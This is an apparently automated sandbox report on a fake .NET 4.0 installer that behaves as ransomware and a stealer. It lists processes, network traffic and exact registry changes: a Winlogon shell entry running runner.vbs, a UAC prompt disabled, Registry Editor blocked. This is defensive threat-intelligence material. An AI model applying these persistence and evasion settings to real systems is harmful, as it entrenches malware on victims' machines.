Malware Analysis Report

2025-03-15 00:56

Sample ID 240626-hvcj5svajk
Target dotNetFx40_Full_setup.exe
SHA256 fa1afff978325f8818ce3a559d67a58297d9154674de7fd8eb03656d93104425
Tags
defense_evasion evasion persistence privilege_escalation ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fa1afff978325f8818ce3a559d67a58297d9154674de7fd8eb03656d93104425

Threat Level: Known bad

The file dotNetFx40_Full_setup.exe was found to be: Known bad.

Malicious Activity Summary

defense_evasion evasion persistence privilege_escalation ransomware spyware stealer trojan

UAC bypass

Modifies WinLogon for persistence

Renames multiple (499) files with added filename extension

Blocklisted process makes network request

Disables Task Manager via registry modification

Downloads MZ/PE file

Disables RegEdit via registry modification

Boot or Logon Autostart Execution: Active Setup

Checks computer location settings

Executes dropped EXE

Modifies system executable filetype association

Reads user/profile data of web browsers

Loads dropped DLL

Drops desktop.ini file(s)

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Drops file in Program Files directory

Drops file in Windows directory

Access Token Manipulation: Create Process with Token

Enumerates physical storage devices

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Suspicious behavior: RenamesItself

Modifies Control Panel

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Checks processor information in registry

Suspicious use of SendNotifyMessage

System policy modification

Modifies data under HKEY_USERS

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-26 07:03

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-26 07:03

Reported

2024-06-26 07:33

Platform

win7-20240419-en

Max time kernel

1799s

Max time network

1749s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dotNetFx40_Full_setup.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\fefeab4e7d649df28de52093ebac6b\Setup.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\fefeab4e7d649df28de52093ebac6b\Setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\fefeab4e7d649df28de52093ebac6b\Setup.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2976 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\dotNetFx40_Full_setup.exe C:\fefeab4e7d649df28de52093ebac6b\Setup.exe
PID 2080 wrote to memory of 3060 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 1812 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 2740 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2080 wrote to memory of 2672 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Users\Admin\AppData\Local\Temp\dotNetFx40_Full_setup.exe

"C:\Users\Admin\AppData\Local\Temp\dotNetFx40_Full_setup.exe"

C:\fefeab4e7d649df28de52093ebac6b\Setup.exe

C:\fefeab4e7d649df28de52093ebac6b\\Setup.exe /x86 /x64 /ia64 /web

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6849758,0x7fef6849768,0x7fef6849778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1128 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1556 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1620 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2300 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2308 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1248 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1432 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3408 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2944 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3008 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3612 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2640 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2616 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=2484 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=2580 --field-trial-handle=1220,i,14937255884344643408,17197949225456008359,131072 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.187.206:443 apis.google.com tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.46:443 play.google.com tcp
N/A 224.0.0.251:5353 udp
GB 142.250.187.196:443 www.google.com udp
GB 142.250.200.46:443 play.google.com udp
US 8.8.8.8:53 consent.google.com udp
GB 216.58.213.14:443 consent.google.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 github.githubassets.com udp
US 185.199.110.154:443 github.githubassets.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 216.58.213.10:443 content-autofill.googleapis.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 8.8.8.8:53 bonzibuddy.netlify.com udp
DE 18.192.94.96:443 bonzibuddy.netlify.com tcp
DE 18.192.94.96:443 bonzibuddy.netlify.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
GB 216.58.213.3:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 beacons.gvt2.com udp
GB 216.58.213.3:443 beacons.gcp.gvt2.com udp

Files

Analysis: behavioral2

Detonation Overview

Submitted 2024-06-26 07:03
Reported 2024-06-26 07:10
Platform win10v2004-20240611-en
Max time kernel 402s
Max time network 444s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dotNetFx40_Full_setup.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\bug32\\runner.vbs\"" C:\Windows\System32\wscript.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Consentpromptbehavioradmin = "0" C:\Windows\system32\wscript.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\System32\wscript.exe N/A

Renames multiple (499) files with added filename extension

ransomware

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95} C:\Windows\system32\unregmp2.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}\DontAsk = "2" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}\Version = "12,0,19041,1266" C:\Windows\system32\unregmp2.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}\IsInstalled = "0" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}\Stubpath = "%SystemRoot%\\system32\\unregmp2.exe /ShowWMP" C:\Windows\system32\unregmp2.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools = "1" C:\Windows\System32\wscript.exe N/A

Disables Task Manager via registry modification

evasion

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\BUG32.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation C:\Windows\System32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation C:\Windows\System32\wscript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\2d1a5f6ae1e78fa0c8bf8beaee61\Setup.exe N/A
N/A N/A C:\Users\Admin\Downloads\BUG32.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon C:\Windows\System32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Bug32\\icon.ico" C:\Windows\System32\wscript.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Public\Music\desktop.ini C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File created C:\Users\Admin\Music\desktop.ini C:\Windows\System32\wscript.exe N/A
File created C:\Users\Admin\OneDrive\desktop.ini C:\Windows\System32\wscript.exe N/A
File created C:\Users\Admin\Pictures\desktop.ini C:\Windows\System32\wscript.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File created C:\Users\Admin\Downloads\desktop.ini C:\Windows\System32\wscript.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Windows\system32\unregmp2.exe N/A
File created C:\Users\Admin\3D Objects\desktop.ini C:\Windows\System32\wscript.exe N/A
File created C:\Users\Admin\Documents\desktop.ini C:\Windows\System32\wscript.exe N/A
File created C:\Users\Admin\Favorites\desktop.ini C:\Windows\System32\wscript.exe N/A
File created C:\Users\Admin\Searches\desktop.ini C:\Windows\System32\wscript.exe N/A
File created C:\Users\Admin\Videos\desktop.ini C:\Windows\System32\wscript.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File created C:\Users\Admin\Contacts\desktop.ini C:\Windows\System32\wscript.exe N/A
File created C:\Users\Admin\Desktop\desktop.ini C:\Windows\System32\wscript.exe N/A
File created C:\Users\Admin\Links\desktop.ini C:\Windows\System32\wscript.exe N/A
File created C:\Users\Admin\Saved Games\desktop.ini C:\Windows\System32\wscript.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\L: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\A: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\G: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\N: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\V: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\W: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\E: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\I: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\T: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\X: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\H: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\L: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\P: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\Z: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\B: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\Q: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\O: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Y: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\K: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\M: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\U: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\J: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\R: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\S: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A camo.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Windows Media Player\wmplayer.exe C:\Windows\system32\unregmp2.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll C:\Windows\system32\svchost.exe N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\System32\wscript.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\2d1a5f6ae1e78fa0c8bf8beaee61\Setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\2d1a5f6ae1e78fa0c8bf8beaee61\Setup.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\Cursors C:\Windows\System32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\Cursors\Arrow = "C:\\bug32\\bx.cur" C:\Windows\System32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\Cursors\AppStarting = "C:\\bug32\\bx.cur" C:\Windows\System32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\Cursors\Hand = "C:\\bug32\\bx.cur" C:\Windows\System32\wscript.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133638590046410428" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

